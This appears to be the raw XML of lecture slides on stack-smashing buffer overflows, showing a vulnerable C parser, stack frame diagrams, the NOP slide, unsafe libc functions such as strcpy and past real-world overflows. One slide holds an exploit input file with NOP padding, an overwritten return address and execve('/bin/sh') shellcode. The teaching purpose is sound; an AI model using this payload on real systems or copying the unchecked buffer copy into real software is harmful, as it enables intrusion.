            </a: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80000"/>
              </a:lnSpc>
            </a:pPr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03810" y="956475"/>
            <a:ext cx="4201615" cy="39199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Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="2832484"/>
            <a:ext cx="3887992" cy="170200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9:int parse(FILE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10:  char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[5],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[128];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fread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1, 256,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19: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+ 4;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20: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(“Location is %s\n”,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22:  return 0; }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="1394331"/>
            <a:ext cx="3887992" cy="1425005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1:void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(char* in, char* out)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3:  while (in[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]!=‘\0’ &amp;&amp; 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]!=‘n’) {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4:    out[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tolower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(in[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]);</a:t>
            </a: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5:   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++;</a:t>
            </a:r>
          </a:p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6:  }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7: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] = ‘\0’;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8:}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="4552876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23: /** main to load a file and run parse */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8132" y="972152"/>
            <a:ext cx="87107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/>
              <a:t>parse.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="Right Arrow 60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1885508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-83929" y="1613624"/>
            <a:ext cx="87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104334" y="193712"/>
            <a:ext cx="182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ACTIVATE POINT!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1" name="Right Arrow 110"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="66289" y="4254852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-17640" y="3982968"/>
            <a:ext cx="87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8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4" grpId="0"/>
      <p:bldP spid="74" grpId="0"/>
      <p:bldP spid="111" grpId="0" animBg="1"/>
      <p:bldP spid="1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0"/>
            <a:ext cx="9144000" cy="632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2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820204"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4839710" y="950628"/>
          <a:ext cx="2418868" cy="42942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Shellcode</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean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----------------------------------------</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="11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NOP</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="11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NOP</a:t>
                      </a:r>
                    </a:p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11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11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>
                        <a:lnSpc>
                          <a:spcPct val="60000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="11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</a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="11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NOP</a:t>
                      </a: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crafted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 address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buffer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25400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The NOP Slide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337902" y="1489996"/>
            <a:ext cx="2613522" cy="3771873"/>
            <a:chOff x="664034" y="1756556"/>
            <a:chExt cx="2613522" cy="3771873"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="TextBox 31"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="664034" y="3125108"/>
              <a:ext cx="8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33" name="Elbow Connector 32"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="32" idx="3"/>
              <a:endCxn id="35" idx="3"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="1526033" y="2075317"/>
              <a:ext cx="11301" cy="1234457"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3">
              <a:avLst>
                <a:gd name="adj1" fmla="val 4488497"/>
              </a:avLst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75335" y="1872184"/>
              <a:ext cx="861999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415557" y="5159097"/>
              <a:ext cx="8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05813" y="1756556"/>
              <a:ext cx="8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364964" y="6240604"/>
            <a:ext cx="71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‘/x90’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425247"/>
            <a:ext cx="307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Problem: how does attacker determine ret-address?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4034945" y="5440929"/>
            <a:ext cx="5109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prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Solution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: NOP slide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-28575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</a:rPr>
              <a:t>Guess approximate stack state when the function is called</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="0" indent="-28575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</a:rPr>
              <a:t>Insert many NOPs before Shell Code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777899"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="436751" y="1542068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arguments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return address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stack</a:t>
                      </a:r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</a:rPr>
                        <a:t> frame pointer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buffer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1977599" y="1124963"/>
            <a:ext cx="4118578" cy="4143791"/>
            <a:chOff x="6146840" y="1380239"/>
            <a:chExt cx="4118578" cy="4143791"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="19" name="Group 18"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6146840" y="1380239"/>
              <a:ext cx="3859159" cy="3040464"/>
              <a:chOff x="6146840" y="1380239"/>
              <a:chExt cx="3859159" cy="304046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146840" y="1380239"/>
                <a:ext cx="861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23" name="Elbow Connector 22"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="24" idx="3"/>
                <a:endCxn id="22" idx="3"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipH="1" flipV="1">
                <a:off x="7008839" y="1564905"/>
                <a:ext cx="20062" cy="2027114"/>
              </a:xfrm>
              <a:prstGeom prst="bentConnector3">
                <a:avLst>
                  <a:gd name="adj1" fmla="val -1139463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166902" y="3407353"/>
                <a:ext cx="861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151235" y="1897181"/>
                <a:ext cx="1449661" cy="523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To previous stack</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
                  <a:t> frame pointer</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="26" name="Elbow Connector 25"/>
              <p:cNvCxnSpPr>
                <a:stCxn id="30" idx="3"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="7040202" y="3321062"/>
                <a:ext cx="1283621" cy="368117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7053390" y="3774372"/>
                <a:ext cx="1411532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To  the instruction at which  this function was called</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="1200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178203" y="3136396"/>
                <a:ext cx="861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9144000" y="3523994"/>
                <a:ext cx="861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7114480" y="5154698"/>
              <a:ext cx="8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03419" y="1752157"/>
              <a:ext cx="8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79525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089" y="-363760"/>
            <a:ext cx="7772400" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>The NOP Slide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574476"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="-2923249" y="2112254"/>
          <a:ext cx="2418868" cy="372344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2418868"/>
              </a:tblGrid>
              <a:tr h="723601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args</a:t>
                      </a:r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frame </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0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ptr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3888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exception handlers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3200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local variables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2729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callee</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1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saved registers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4">
                            <a:lumMod val="75000"/>
                          </a:schemeClr>
                        </a:gs>
                        <a:gs pos="100000">
                          <a:schemeClr val="accent4">
                            <a:alpha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856727" y="5288941"/>
            <a:ext cx="8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597199" y="2781231"/>
            <a:ext cx="337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err="1" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fp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86218" y="3049883"/>
            <a:ext cx="1120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return address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585776" y="3335268"/>
            <a:ext cx="11558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</a:rPr>
              <a:t>stack frame </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ptr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99868" y="3634897"/>
            <a:ext cx="21986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header_ok</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?,?,?,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0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[4]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buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[3,2,1,0]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[128,127,126,125]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRP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[7,6,5,4]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cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[3,2,1,0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>url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b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>header_ok</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:prstClr val="black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367292" y="296814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365019" y="3234527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365018" y="3519469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68613" y="397081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66341" y="414763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366339" y="4334886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364066" y="4511711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366339" y="498408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366339" y="5165295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366339" y="5352543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366339" y="5523510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19899" y="3141319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09486" y="341704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0xbffff758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66433" y="3669928"/>
            <a:ext cx="16489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0xbffff740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0xbffff73c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>
              <a:lnSpc>
                <a:spcPct val="50000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty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0xbffff6c4</a:t>
            </a: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0xbffff6c0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0xbffff74c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0xbffff748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777321"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="1285755"/>
          <a:ext cx="1435608" cy="467769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5608"/>
              </a:tblGrid>
              <a:tr h="1482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shellcode</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0" smtClean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90909090</a:t>
                      </a:r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90909090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90909090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tx2">
                            <a:lumMod val="20000"/>
                            <a:lumOff val="80000"/>
                            <a:alpha val="50000"/>
                          </a:schemeClr>
                        </a:gs>
                      </a:gsLst>
                      <a:lin ang="16200000" scaled="0"/>
                      <a:tileRect/>
                    </a:gradFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="34052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90909090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9544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fffff764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8080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  <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000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58367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</a:t>
                      </a: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Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>61616161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0x00000000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50000"/>
                        </a:lnSpc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.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200" b="1" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:latin typeface="Courier"/>
                          <a:cs typeface="Courier"/>
                        </a:rPr>
                        <a:t>0x41414141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0x20544547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0xbffff6c4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0x00000001</a:t>
                      </a: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95443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863438" y="6504348"/>
            <a:ext cx="145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(Unallocated)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/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613804"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5882594" y="5974044"/>
          <a:ext cx="1432247" cy="12978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432247"/>
              </a:tblGrid>
              <a:tr h="595836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02004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 marL="62982" marR="62982" marT="31491" marB="31491" anchor="ctr">
                    <a:lnL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4" name="Rectangle 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4715524" y="2823321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0xbffff760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03810" y="4966131"/>
            <a:ext cx="4201615" cy="16664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88132" y="4981809"/>
            <a:ext cx="48549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file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/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260080" y="5403990"/>
            <a:ext cx="4082631" cy="116160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1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GET AAAAAAAAAAAAAAAAAAAA\x64\xf7\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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/x90/x90/x90/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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x90</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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/x90/x90/x90/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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x90</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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/x90/x90/x90/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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x90/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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x90/x90/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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x90</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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/x90/x90/x90/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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x90</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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/x90/x90/x90/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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x90</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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/x90/x90/x90/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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x90</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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/x90/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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x90/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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x90/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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x90</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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/x90/x90/x90/x90</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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/x90</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="11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/x90/x90/x90/x90</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xeb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x1f\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x5e\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>x89\x76\x08\x31\xc0\x88\x46\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x80\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x89\xd8\x40\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x80\xe8\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xdc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100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4134" y="4970531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(input file)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94805" y="5989725"/>
            <a:ext cx="141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copy_lower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711147" y="237988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b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>0xbffff764</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="12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7364233" y="3825292"/>
            <a:ext cx="2523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Left Arrow 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3241149">
            <a:off x="5547293" y="2791785"/>
            <a:ext cx="633933" cy="268523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03810" y="956475"/>
            <a:ext cx="4201615" cy="39199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Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="2832484"/>
            <a:ext cx="3887992" cy="1702004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9:int parse(FILE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10:  char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[5], *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[128];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fread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, 1, 256,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fp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header_ok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19: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cmd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+ 4;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20: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21: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printf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(“Location is %s\n”,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22:  return 0; }</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="1394331"/>
            <a:ext cx="3887992" cy="1425005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1:void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copy_lower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(char* in, char* out) {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2: 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 3:  while (in[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]!=‘\0’ &amp;&amp; in[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]!=‘n’) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pP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4:    out[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 =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tolower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(in[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]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="12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5:    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err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++;</a:t>
            </a:r>
          </a:p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6:  }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7:  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buf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sz="1200" dirty="0" err="1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] = ‘\0’;</a:t>
            </a:r>
          </a:p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rgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 8:}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="358525" y="4552876"/>
            <a:ext cx="3887992" cy="261610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rPr>
              <a:t>23: /** main to load a file and run parse */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8132" y="972152"/>
            <a:ext cx="87107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/>
              <a:t>parse.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="Right Arrow 49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1885508"/>
            <a:ext cx="474836" cy="2587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-83929" y="1613624"/>
            <a:ext cx="87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13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More on Stack Smashing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complications on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Shellcode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Shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> should not contain the ‘\0’ character.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Overflow should not crash program before the frame’s function exits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sample remote stack smashing overflows:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(2007) Overflow in Windows animated cursors (ANI).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(2005) Overflow in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Symantic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Virus Detection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35975" y="4735333"/>
            <a:ext cx="1481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LoadAniIcon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()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4749" y="5656048"/>
            <a:ext cx="453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test.GetPrivateProfileString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> “file”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[long string]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355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5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Many unsafe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>libc</a:t>
            </a:r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 functions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112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15280" y="1422400"/>
            <a:ext cx="8675766" cy="4216819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2400" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000090"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>dest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> char *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>	</a:t>
